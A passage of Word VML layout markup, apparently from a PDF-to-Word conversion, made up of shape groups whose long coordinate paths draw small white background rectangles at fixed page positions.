4112,10049,4115,10049,4118,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10049,4121,10050,4121,10050,4121,10050,4121,10050,4121,10050,4121,10050,4121,10050,4121,10051,4121,10051,4121,10051,4121,10051,4121,10052,4121,10052,4121,10052,4121,10053,4121,10053,4121,10054,4121,10054,4121,10055,4121,10055,4121,10056,4121,10056,4121,10057,4121,10057,4121,10058,4121,10059,4121,10059,4121,10060,4121,10061,4121,10062,4121,10063,4121,10064,4121,10065,4121,10066,4121,10067,4121,10068,4121,10069,4121,10070,4121,10072,4121,10073,4121,10074,4121,10076,4121,10077,4121,10079,4121,10080,4121,10082,4121,10083,4121,10085,4121,10087,4121,10089,4121,10091,4121,10093,4121,10095,4121,10097,4121,10099,4121,10101,4121,10103,4121,10106,4121,10108,4121,10110,4121,10113,4121,10116,4121,10118,4121,10121,4121,10124,4121,10127,4121,10130,4121,10133,4121,10136,4121,10139,4121,10142,4121,10145,4121,10149,4121,10152,4121,10156,4121,10159,4121,10163,4121,10167,4121,10171,4121,10175,4121,10179,4121,10183,4121,10187,4121,10192,4121,10196,4121,10200,4121,10205,4121,10210,4121,10215,4121,10219,4121,10224,4121,10229,4121,10235,4121,10240,4121,10245,4121,10251,4121,10256,4121,10262,4121,10268,4121,10273,4121,10279,4121,10285,4121,10292,4121,10298,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4121,10304,4120,10304,4120,10304,4120,10304,4120,10304,4120,10304,4120,10304,4120,10304,4120,10304,4119,10304,4119,10304,4119,10304,4119,10304,4119,10304,4118,10304,4118,10304,4118,10304,4117,10304,4117,10304,4117,10304,4117,10304,4116,10304,4116,10304,4115,10304,4115,10304,4115,10304,4114,10304,4114,10304,4113,10304,4113,10304,4112,10304,4112,10304,4111,10304,4110,10304,4110,10304,4109,10304,4109,10304,4108,10304,4107,10304,4106,10304,4106,10304,4105,10304,4104,10304,4103,10304,4102,10304,4102,10304,4101,10304,4100,10304,4099,10304,4098,10304,4097,10304,4096,10304,4094,10304,4093,10304,4092,10304,4091,10304,4090,10304,4089,10304,4087,10304,4086,10304,4085,10304,4083,10304,4082,10304,4080,10304,4079,10304,4077,10304,4076,10304,4074,10304,4073,10304,4071,10304,4069,10304,4067,10304,4066,10304,4064,10304,4062,10304,4060,10304,4058,10304,4056,10304,4054,10304,4052,10304,4050,10304,4048,10304,4045,10304,4043,10304,4041,10304,4039,10304,4036,10304,4034,10304,4031,10304,4029,10304,4026,10304,4024,10304,4021,10304,4018,10304,4016,10304,4013,10304,4010,10304,4007,10304,4004,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10304,4001,10303,4001,10303,4001,10303,4001,10303,4001,10303,4001,10303,4001,10302,4001,10302,4001,10302,4001,10302,4001,10301,4001,10301,4001,10301,4001,10300,4001,10300,4001,10299,4001,10299,4001,10298,4001,10298,4001,10297,4001,10297,4001,10296,4001,10295,4001,10295,4001,10294,4001,10293,4001,10292,4001,10291,4001,10290,4001,10289,4001,10288,4001,10287,4001,10286,4001,10285,4001,10284,4001,10283,4001,10282,4001,10280,4001,10279,4001,10278,4001,10276,4001,10275,4001,10273,4001,10271,4001,10270,4001,10268,4001,10266,4001,10265,4001,10263,4001,10261,4001,10259,4001,10257,4001,10254,4001,10252,4001,10250,4001,10248,4001,10245,4001,10243,4001,10240,4001,10238,4001,10235,4001,10232,4001,10230,4001,10227,4001,10224,4001,10221,4001,10218,4001,10214,4001,10211,4001,10208,4001,10204,4001,10201,4001,10197,4001,10194,4001,10190,4001,10186,4001,10182,4001,10178,4001,10174,4001,10170,4001,10166,4001,10162,4001,10157,4001,10153,4001,10148,4001,10144,4001,10139,4001,10134,4001,10129,4001,10124,4001,10119,4001,10113,4001,10108,4001,10103,4001,10097,4001,10091,4001,10086,4001,10080,4001,10074,4001,10068,4001,10062,4001,10055,4001,10049e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:533.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,10670" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:10670;width:130;height:270" coordorigin="2650,10670" coordsize="130,270" path="m2665,10694l2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2665,10694,2666,10694,2666,10694,2666,10694,2666,10694,2666,10694,2666,10694,2666,10694,2666,10694,2666,10694,2666,10694,2666,10694,2666,10694,2667,10694,2667,10694,2667,10694,2667,10694,2667,10694,2667,10694,2668,10694,2668,10694,2668,10694,2668,10694,2669,10694,2669,10694,2669,10694,2670,10694,2670,10694,2670,10694,2671,10694,2671,10694,2671,10694,2672,10694,2672,10694,2673,10694,2673,10694,2674,10694,2674,10694,2675,10694,2675,10694,2676,10694,2677,10694,2677,10694,2678,10694,2679,10694,2679,10694,2680,10694,2681,10694,2682,10694,2682,10694,2683,10694,2684,10694,2685,10694,2686,10694,2687,10694,2688,10694,2689,10694,2690,10694,2691,10694,2692,10694,2693,10694,2694,10694,2695,10694,2697,10694,2698,10694,2699,10694,2700,10694,2702,10694,2703,10694,2705,10694,2706,10694,2708,10694,2709,10694,2711,10694,2712,10694,2714,10694,2716,10694,2717,10694,2719,10694,2721,10694,2723,10694,2725,10694,2726,10694,2728,10694,2730,10694,2732,10694,2734,10694,2737,10694,2739,10694,2741,10694,2743,10694,2745,10694,2748,10694,2750,10694,2753,10694,2755,10694,2758,10694,2760,10694,2763,10694,2765,10694,2768,10694,2771,10694,2774,10694,2777,10694,2779,10694,2782,10694,2785,10694,2785,10694,2785,10694,2785,10694,2785,10694,2785,10694,2785,10694,2785,10694,2785,10694,2785,10694,2785,10695,2785,10695,2785,10695,2785,10695,2785,10695,2785,10695,2785,10695,2785,10695,2785,10695,2785,10695,2785,10695,2785,10696,2785,10696,2785,10696,2785,10696,2785,10696,2785,10697,2785,10697,2785,10697,2785,10698,2785,10698,2785,10698,2785,10699,2785,10699,2785,10700,2785,10700,2785,10701,2785,10701,2785,10702,2785,10703,2785,10703,2785,10704,2785,10705,2785,10706,2785,10706,2785,10707,2785,10708,2785,10709,2785,10710,2785,10711,2785,10712,2785,10713,2785,10714,2785,10716,2785,10717,2785,10718,2785,10720,2785,10721,2785,10722,2785,10724,2785,10725,2785,10727,2785,10729,2785,10730,2785,10732,2785,10734,2785,10736,2785,10738,2785,10740,2785,10742,2785,10744,2785,10746,2785,10749,2785,10751,2785,10753,2785,10756,2785,10758,2785,10761,2785,10764,2785,10766,2785,10769,2785,10772,2785,10775,2785,10778,2785,10781,2785,10784,2785,10787,2785,10791,2785,10794,2785,10798,2785,10801,2785,10805,2785,10808,2785,10812,2785,10816,2785,10820,2785,10824,2785,10828,2785,10833,2785,10837,2785,10841,2785,10846,2785,10850,2785,10855,2785,10860,2785,10865,2785,10870,2785,10875,2785,10880,2785,10885,2785,10890,2785,10896,2785,10901,2785,10907,2785,10913,2785,10919,2785,10925,2785,10931,2785,10937,2785,10943,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2785,10950,2784,10950,2784,10950,2784,10950,2784,10950,2784,10950,2784,10950,2783,10950,2783,10950,2783,10950,2783,10950,2783,10950,2782,10950,2782,10950,2782,10950,2781,10950,2781,10950,2781,10950,2780,10950,2780,10950,2780,10950,2779,10950,2779,10950,2778,10950,2778,10950,2778,10950,2777,10950,2776,10950,2776,10950,2775,10950,2775,10950,2774,10950,2774,10950,2773,10950,2772,10950,2772,10950,2771,10950,2770,10950,2769,10950,2768,10950,2768,10950,2767,10950,2766,10950,2765,10950,2764,10950,2763,10950,2762,10950,2761,10950,2760,10950,2759,10950,2758,10950,2757,10950,2755,10950,2754,10950,2753,10950,2752,10950,2750,10950,2749,10950,2748,10950,2746,10950,2745,10950,2743,10950,2742,10950,2740,10950,2738,10950,2737,10950,2735,10950,2733,10950,2732,10950,2730,10950,2728,10950,2726,10950,2724,10950,2722,10950,2720,10950,2718,10950,2716,10950,2714,10950,2712,10950,2710,10950,2708,10950,2705,10950,2703,10950,2701,10950,2698,10950,2696,10950,2693,10950,2691,10950,2688,10950,2685,10950,2683,10950,2680,10950,2677,10950,2674,10950,2671,10950,2668,10950,2665,10950,2665,10950,2665,10950,2665,10950,2665,10950,2665,10950,2665,10950,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10949,2665,10948,2665,10948,2665,10948,2665,10948,2665,10948,2665,10947,2665,10947,2665,10947,2665,10947,2665,10946,2665,10946,2665,10945,2665,10945,2665,10945,2665,10944,2665,10944,2665,10943,2665,10942,2665,10942,2665,10941,2665,10941,2665,10940,2665,10939,2665,10938,2665,10937,2665,10937,2665,10936,2665,10935,2665,10934,2665,10933,2665,10932,2665,10931,2665,10929,2665,10928,2665,10927,2665,10926,2665,10924,2665,10923,2665,10921,2665,10920,2665,10918,2665,10917,2665,10915,2665,10913,2665,10912,2665,10910,2665,10908,2665,10906,2665,10904,2665,10902,2665,10900,2665,10898,2665,10895,2665,10893,2665,10891,2665,10888,2665,10886,2665,10883,2665,10880,2665,10878,2665,10875,2665,10872,2665,10869,2665,10866,2665,10863,2665,10860,2665,10857,2665,10853,2665,10850,2665,10846,2665,10843,2665,10839,2665,10835,2665,10832,2665,10828,2665,10824,2665,10820,2665,10816,2665,10811,2665,10807,2665,10803,2665,10798,2665,10794,2665,10789,2665,10784,2665,10779,2665,10774,2665,10769,2665,10764,2665,10759,2665,10753,2665,10748,2665,10742,2665,10737,2665,10731,2665,10725,2665,10719,2665,10713,2665,10707,2665,10701,2665,10694e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:533.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,10670" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:10670;width:130;height:270" coordorigin="3010,10670" coordsize="130,270" path="m3026,10694l3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3026,10694,3027,10694,3027,10694,3027,10694,3027,10694,3027,10694,3027,10694,3027,10694,3028,10694,3028,10694,3028,10694,3028,10694,3029,10694,3029,10694,3029,10694,3029,10694,3030,10694,3030,10694,3030,10694,3031,10694,3031,10694,3032,10694,3032,10694,3032,10694,3033,10694,3033,10694,3034,10694,3034,10694,3035,10694,3036,10694,3036,10694,3037,10694,3037,10694,3038,10694,3039,10694,3039,10694,3040,10694,3041,10694,3042,10694,3043,10694,3043,10694,3044,10694,3045,10694,3046,10694,3047,10694,3048,10694,3049,10694,3050,10694,3051,10694,3052,10694,3053,10694,3054,10694,3056,10694,3057,10694,3058,10694,3059,10694,3061,10694,3062,10694,3063,10694,3065,10694,3066,10694,3068,10694,3069,10694,3071,10694,3072,10694,3074,10694,3076,10694,3077,10694,3079,10694,3081,10694,3083,10694,3085,10694,3087,10694,3089,10694,3091,10694,3093,10694,3095,10694,3097,10694,3099,10694,3101,10694,3103,10694,3106,10694,3108,10694,3110,10694,3113,10694,3115,10694,3118,10694,3120,10694,3123,10694,3126,10694,3128,10694,3131,10694,3134,10694,3137,10694,3140,10694,3143,10694,3146,10694,3146,10694,3146,10694,3146,10694,3146,10694,3146,10694,3146,10694,3146,10694,3146,10694,3146,10694,3146,10695,3146,10695,3146,10695,3146,10695,3146,10695,3146,10695,3146,10695,3146,10695,3146,10695,3146,10695,3146,10695,3146,10696,3146,10696,3146,10696,3146,10696,3146,10696,3146,10697,3146,10697,3146,10697,3146,10698,3146,10698,3146,10698,3146,10699,3146,10699,3146,10700,3146,10700,3146,10701,3146,10701,3146,10702,3146,10703,3146,10703,3146,10704,3146,10705,3146,10706,3146,10706,3146,10707,3146,10708,3146,10709,3146,10710,3146,10711,3146,10712,3146,10713,3146,10714,3146,10716,3146,10717,3146,10718,3146,10720,3146,10721,3146,10722,3146,10724,3146,10725,3146,10727,3146,10729,3146,10730,3146,10732,3146,10734,3146,10736,3146,10738,3146,10740,3146,10742,3146,10744,3146,10746,3146,10749,3146,10751,3146,10753,3146,10756,3146,10758,3146,10761,3146,10764,3146,10766,3146,10769,3146,10772,3146,10775,3146,10778,3146,10781,3146,10784,3146,10787,3146,10791,3146,10794,3146,10798,3146,10801,3146,10805,3146,10808,3146,10812,3146,10816,3146,10820,3146,10824,3146,10828,3146,10833,3146,10837,3146,10841,3146,10846,3146,10850,3146,10855,3146,10860,3146,10865,3146,10870,3146,10875,3146,10880,3146,10885,3146,10890,3146,10896,3146,10901,3146,10907,3146,10913,3146,10919,3146,10925,3146,10931,3146,10937,3146,10943,3146,10950,3146,10950,3146,10950,3146,10950,3146,10950,3146,10950,3146,10950,3146,10950,3146,10950,3146,10950,3146,10950,3146,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3145,10950,3144,10950,3144,10950,3144,10950,3144,10950,3144,10950,3144,10950,3143,10950,3143,10950,3143,10950,3143,10950,3143,10950,3142,10950,3142,10950,3142,10950,3141,10950,3141,10950,3141,10950,3140,10950,3140,10950,3140,10950,3139,10950,3139,10950,3138,10950,3138,10950,3137,10950,3137,10950,3136,10950,3136,10950,3135,10950,3134,10950,3134,10950,3133,10950,3132,10950,3132,10950,3131,10950,3130,10950,3129,10950,3129,10950,3128,10950,3127,10950,3126,10950,3125,10950,3124,10950,3123,10950,3122,10950,3121,10950,3120,10950,3119,10950,3118,10950,3117,10950,3116,10950,3114,10950,3113,10950,3112,10950,3110,10950,3109,10950,3108,10950,3106,10950,3105,10950,3103,10950,3102,10950,3100,10950,3099,10950,3097,10950,3095,10950,3094,10950,3092,10950,3090,10950,3088,10950,3086,10950,3084,10950,3083,10950,3081,10950,3079,10950,3076,10950,3074,10950,3072,10950,3070,10950,3068,10950,3065,10950,3063,10950,3061,10950,3058,10950,3056,10950,3053,10950,3051,10950,3048,10950,3045,10950,3043,10950,3040,10950,3037,10950,3034,10950,3031,10950,3029,10950,3026,10950,3026,10950,3026,10950,3026,10950,3026,10950,3026,10950,3026,10950,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10949,3026,10948,3026,10948,3026,10948,3026,10948,3026,10948,3026,10947,3026,10947,3026,10947,3026,10947,3026,10946,3026,10946,3026,10945,3026,10945,3026,10945,3026,10944,3026,10944,3026,10943,3026,10942,3026,10942,3026,10941,3026,10941,3026,10940,3026,10939,3026,10938,3026,10937,3026,10937,3026,10936,3026,10935,3026,10934,3026,10933,3026,10932,3026,10931,3026,10929,3026,10928,3026,10927,3026,10926,3026,10924,3026,10923,3026,10921,3026,10920,3026,10918,3026,10917,3026,10915,3026,10913,3026,10912,3026,10910,3026,10908,3026,10906,3026,10904,3026,10902,3026,10900,3026,10898,3026,10895,3026,10893,3026,10891,3026,10888,3026,10886,3026,10883,3026,10880,3026,10878,3026,10875,3026,10872,3026,10869,3026,10866,3026,10863,3026,10860,3026,10857,3026,10853,3026,10850,3026,10846,3026,10843,3026,10839,3026,10835,3026,10832,3026,10828,3026,10824,3026,10820,3026,10816,3026,10811,3026,10807,3026,10803,3026,10798,3026,10794,3026,10789,3026,10784,3026,10779,3026,10774,3026,10769,3026,10764,3026,10759,3026,10753,3026,10748,3026,10742,3026,10737,3026,10731,3026,10725,3026,10719,3026,10713,3026,10707,3026,10701,3026,10694e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:336.500pt;margin-top:533.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6730,10670" coordsize="130,270">
        <v:shape style="position:absolute;left:6730;top:10670;width:130;height:270" coordorigin="6730,10670" coordsize="130,270" path="m6747,10694l6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6748,10694,6749,10694,6749,10694,6749,10694,6749,10694,6749,10694,6749,10694,6750,10694,6750,10694,6750,10694,6750,10694,6750,10694,6751,10694,6751,10694,6751,10694,6752,10694,6752,10694,6752,10694,6753,10694,6753,10694,6753,10694,6754,10694,6754,10694,6755,10694,6755,10694,6756,10694,6756,10694,6757,10694,6757,10694,6758,10694,6759,10694,6759,10694,6760,10694,6761,10694,6761,10694,6762,10694,6763,10694,6764,10694,6764,10694,6765,10694,6766,10694,6767,10694,6768,10694,6769,10694,6770,10694,6771,10694,6772,10694,6773,10694,6774,10694,6775,10694,6776,10694,6777,10694,6779,10694,6780,10694,6781,10694,6783,10694,6784,10694,6785,10694,6787,10694,6788,10694,6790,10694,6791,10694,6793,10694,6794,10694,6796,10694,6798,10694,6799,10694,6801,10694,6803,10694,6805,10694,6807,10694,6808,10694,6810,10694,6812,10694,6814,10694,6817,10694,6819,10694,6821,10694,6823,10694,6825,10694,6828,10694,6830,10694,6832,10694,6835,10694,6837,10694,6840,10694,6842,10694,6845,10694,6847,10694,6850,10694,6853,10694,6856,10694,6859,10694,6862,10694,6864,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10695,6867,10695,6867,10695,6867,10695,6867,10695,6867,10695,6867,10695,6867,10695,6867,10695,6867,10695,6867,10695,6867,10696,6867,10696,6867,10696,6867,10696,6867,10696,6867,10697,6867,10697,6867,10697,6867,10698,6867,10698,6867,10698,6867,10699,6867,10699,6867,10700,6867,10700,6867,10701,6867,10701,6867,10702,6867,10703,6867,10703,6867,10704,6867,10705,6867,10706,6867,10706,6867,10707,6867,10708,6867,10709,6867,10710,6867,10711,6867,10712,6867,10713,6867,10714,6867,10716,6867,10717,6867,10718,6867,10720,6867,10721,6867,10722,6867,10724,6867,10725,6867,10727,6867,10729,6867,10730,6867,10732,6867,10734,6867,10736,6867,10738,6867,10740,6867,10742,6867,10744,6867,10746,6867,10749,6867,10751,6867,10753,6867,10756,6867,10758,6867,10761,6867,10764,6867,10766,6867,10769,6867,10772,6867,10775,6867,10778,6867,10781,6867,10784,6867,10787,6867,10791,6867,10794,6867,10798,6867,10801,6867,10805,6867,10808,6867,10812,6867,10816,6867,10820,6867,10824,6867,10828,6867,10833,6867,10837,6867,10841,6867,10846,6867,10850,6867,10855,6867,10860,6867,10865,6867,10870,6867,10875,6867,10880,6867,10885,6867,10890,6867,10896,6867,10901,6867,10907,6867,10913,6867,10919,6867,10925,6867,10931,6867,10937,6867,10943,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6867,10950,6866,10950,6866,10950,6866,10950,6866,10950,6866,10950,6866,10950,6866,10950,6865,10950,6865,10950,6865,10950,6865,10950,6864,10950,6864,10950,6864,10950,6864,10950,6863,10950,6863,10950,6863,10950,6862,10950,6862,10950,6861,10950,6861,10950,6861,10950,6860,10950,6860,10950,6859,10950,6859,10950,6858,10950,6857,10950,6857,10950,6856,10950,6856,10950,6855,10950,6854,10950,6854,10950,6853,10950,6852,10950,6851,10950,6850,10950,6850,10950,6849,10950,6848,10950,6847,10950,6846,10950,6845,10950,6844,10950,6843,10950,6842,10950,6841,10950,6840,10950,6839,10950,6837,10950,6836,10950,6835,10950,6834,10950,6832,10950,6831,10950,6830,10950,6828,10950,6827,10950,6825,10950,6824,10950,6822,10950,6821,10950,6819,10950,6817,10950,6816,10950,6814,10950,6812,10950,6810,10950,6808,10950,6806,10950,6804,10950,6802,10950,6800,10950,6798,10950,6796,10950,6794,10950,6792,10950,6790,10950,6787,10950,6785,10950,6783,10950,6780,10950,6778,10950,6775,10950,6773,10950,6770,10950,6767,10950,6765,10950,6762,10950,6759,10950,6756,10950,6753,10950,6750,10950,6747,10950,6747,10950,6747,10950,6747,10950,6747,10950,6747,10950,6747,10950,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10949,6747,10948,6747,10948,6747,10948,6747,10948,6747,10948,6747,10947,6747,10947,6747,10947,6747,10947,6747,10946,6747,10946,6747,10945,6747,10945,6747,10945,6747,10944,6747,10944,6747,10943,6747,10942,6747,10942,6747,10941,6747,10941,6747,10940,6747,10939,6747,10938,6747,10937,6747,10937,6747,10936,6747,10935,6747,10934,6747,10933,6747,10932,6747,10931,6747,10929,6747,10928,6747,10927,6747,10926,6747,10924,6747,10923,6747,10921,6747,10920,6747,10918,6747,10917,6747,10915,6747,10913,6747,10912,6747,10910,6747,10908,6747,10906,6747,10904,6747,10902,6747,10900,6747,10898,6747,10895,6747,10893,6747,10891,6747,10888,6747,10886,6747,10883,6747,10880,6747,10878,6747,10875,6747,10872,6747,10869,6747,10866,6747,10863,6747,10860,6747,10857,6747,10853,6747,10850,6747,10846,6747,10843,6747,10839,6747,10835,6747,10832,6747,10828,6747,10824,6747,10820,6747,10816,6747,10811,6747,10807,6747,10803,6747,10798,6747,10794,6747,10789,6747,10784,6747,10779,6747,10774,6747,10769,6747,10764,6747,10759,6747,10753,6747,10748,6747,10742,6747,10737,6747,10731,6747,10725,6747,10719,6747,10713,6747,10707,6747,10701,6747,10694e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:229.500pt;margin-top:547.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4590,10950" coordsize="250,270">
        <v:shape style="position:absolute;left:4590;top:10950;width:250;height:270" coordorigin="4590,10950" coordsize="250,270" path="m4601,10965l4601,10965,4601,10965,4601,10965,4601,10965,4601,10965,4601,10965,4601,10965,4601,10965,4601,10965,4601,10965,4601,10965,4602,10965,4602,10965,4602,10965,4602,10965,4602,10965,4602,10965,4602,10965,4602,10965,4602,10965,4602,10965,4603,10965,4603,10965,4603,10965,4603,10965,4604,10965,4604,10965,4604,10965,4604,10965,4605,10965,4605,10965,4606,10965,4606,10965,4606,10965,4607,10965,4607,10965,4608,10965,4609,10965,4609,10965,4610,10965,4610,10965,4611,10965,4612,10965,4613,10965,4613,10965,4614,10965,4615,10965,4616,10965,4617,10965,4618,10965,4619,10965,4620,10965,4621,10965,4623,10965,4624,10965,4625,10965,4626,10965,4628,10965,4629,10965,4631,10965,4632,10965,4634,10965,4635,10965,4637,10965,4639,10965,4640,10965,4642,10965,4644,10965,4646,10965,4648,10965,4650,10965,4652,10965,4655,10965,4657,10965,4659,10965,4661,10965,4664,10965,4666,10965,4669,10965,4672,10965,4674,10965,4677,10965,4680,10965,4683,10965,4686,10965,4689,10965,4692,10965,4695,10965,4698,10965,4702,10965,4705,10965,4709,10965,4712,10965,4716,10965,4720,10965,4723,10965,4727,10965,4731,10965,4735,10965,4740,10965,4744,10965,4748,10965,4753,10965,4757,10965,4762,10965,4766,10965,4771,10965,4776,10965,4781,10965,4786,10965,4791,10965,4796,10965,4802,10965,4807,10965,4812,10965,4818,10965,4824,10965,4830,10965,4835,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10965,4841,10966,4841,10966,4841,10966,4841,10966,4841,10966,4841,10967,4841,10967,4841,10967,4841,10968,4841,10968,4841,10968,4841,10969,4841,10969,4841,10969,4841,10970,4841,10970,4841,10971,4841,10972,4841,10972,4841,10973,4841,10974,4841,10974,4841,10975,4841,10976,4841,10977,4841,10977,4841,10978,4841,10979,4841,10980,4841,10981,4841,10982,4841,10983,4841,10985,4841,10986,4841,10987,4841,10988,4841,10990,4841,10991,4841,10993,4841,10994,4841,10996,4841,10997,4841,10999,4841,11001,4841,11002,4841,11004,4841,11006,4841,11008,4841,11010,4841,11012,4841,11014,4841,11016,4841,11019,4841,11021,4841,11023,4841,11026,4841,11028,4841,11031,4841,11034,4841,11036,4841,11039,4841,11042,4841,11045,4841,11048,4841,11051,4841,11054,4841,11058,4841,11061,4841,11064,4841,11068,4841,11071,4841,11075,4841,11079,4841,11082,4841,11086,4841,11090,4841,11094,4841,11098,4841,11103,4841,11107,4841,11111,4841,11116,4841,11121,4841,11125,4841,11130,4841,11135,4841,11140,4841,11145,4841,11150,4841,11155,4841,11161,4841,11166,4841,11172,4841,11177,4841,11183,4841,11189,4841,11195,4841,11201,4841,11207,4841,11213,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4841,11220,4840,11220,4840,11220,4840,11220,4840,11220,4840,11220,4839,11220,4839,11220,4839,11220,4839,11220,4838,11220,4838,11220,4838,11220,4837,11220,4837,11220,4836,11220,4836,11220,4835,11220,4835,11220,4834,11220,4834,11220,4833,11220,4832,11220,4832,11220,4831,11220,4830,11220,4829,11220,4828,11220,4828,11220,4827,11220,4826,11220,4825,11220,4824,11220,4823,11220,4821,11220,4820,11220,4819,11220,4818,11220,4816,11220,4815,11220,4814,11220,4812,11220,4811,11220,4809,11220,4807,11220,4806,11220,4804,11220,4802,11220,4800,11220,4799,11220,4797,11220,4795,11220,4793,11220,4790,11220,4788,11220,4786,11220,4784,11220,4781,11220,4779,11220,4776,11220,4774,11220,4771,11220,4768,11220,4766,11220,4763,11220,4760,11220,4757,11220,4754,11220,4751,11220,4748,11220,4744,11220,4741,11220,4738,11220,4734,11220,4730,11220,4727,11220,4723,11220,4719,11220,4715,11220,4711,11220,4707,11220,4703,11220,4699,11220,4695,11220,4690,11220,4686,11220,4681,11220,4676,11220,4672,11220,4667,11220,4662,11220,4657,11220,4652,11220,4647,11220,4641,11220,4636,11220,4630,11220,4625,11220,4619,11220,4613,11220,4607,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11220,4601,11219,4601,11219,4601,11219,4601,11219,4601,11219,4601,11219,4601,11219,4601,11219,4601,11219,4601,11218,4601,11218,4601,11218,4601,11218,4601,11218,4601,11217,4601,11217,4601,11217,4601,11216,4601,11216,4601,11216,4601,11215,4601,11215,4601,11214,4601,11214,4601,11213,4601,11213,4601,11212,4601,11211,4601,11211,4601,11210,4601,11209,4601,11208,4601,11208,4601,11207,4601,11206,4601,11205,4601,11204,4601,11203,4601,11202,4601,11201,4601,11200,4601,11198,4601,11197,4601,11196,4601,11194,4601,11193,4601,11192,4601,11190,4601,11189,4601,11187,4601,11185,4601,11184,4601,11182,4601,11180,4601,11178,4601,11176,4601,11174,4601,11172,4601,11170,4601,11168,4601,11165,4601,11163,4601,11161,4601,11158,4601,11156,4601,11153,4601,11151,4601,11148,4601,11145,4601,11142,4601,11139,4601,11136,4601,11133,4601,11130,4601,11127,4601,11123,4601,11120,4601,11116,4601,11113,4601,11109,4601,11106,4601,11102,4601,11098,4601,11094,4601,11090,4601,11086,4601,11081,4601,11077,4601,11073,4601,11068,4601,11064,4601,11059,4601,11054,4601,11049,4601,11044,4601,11039,4601,11034,4601,11029,4601,11024,4601,11018,4601,11013,4601,11007,4601,11001,4601,10995,4601,10989,4601,10983,4601,10977,4601,10971,4601,10965e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:463.500pt;margin-top:547.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9270,10950" coordsize="130,270">
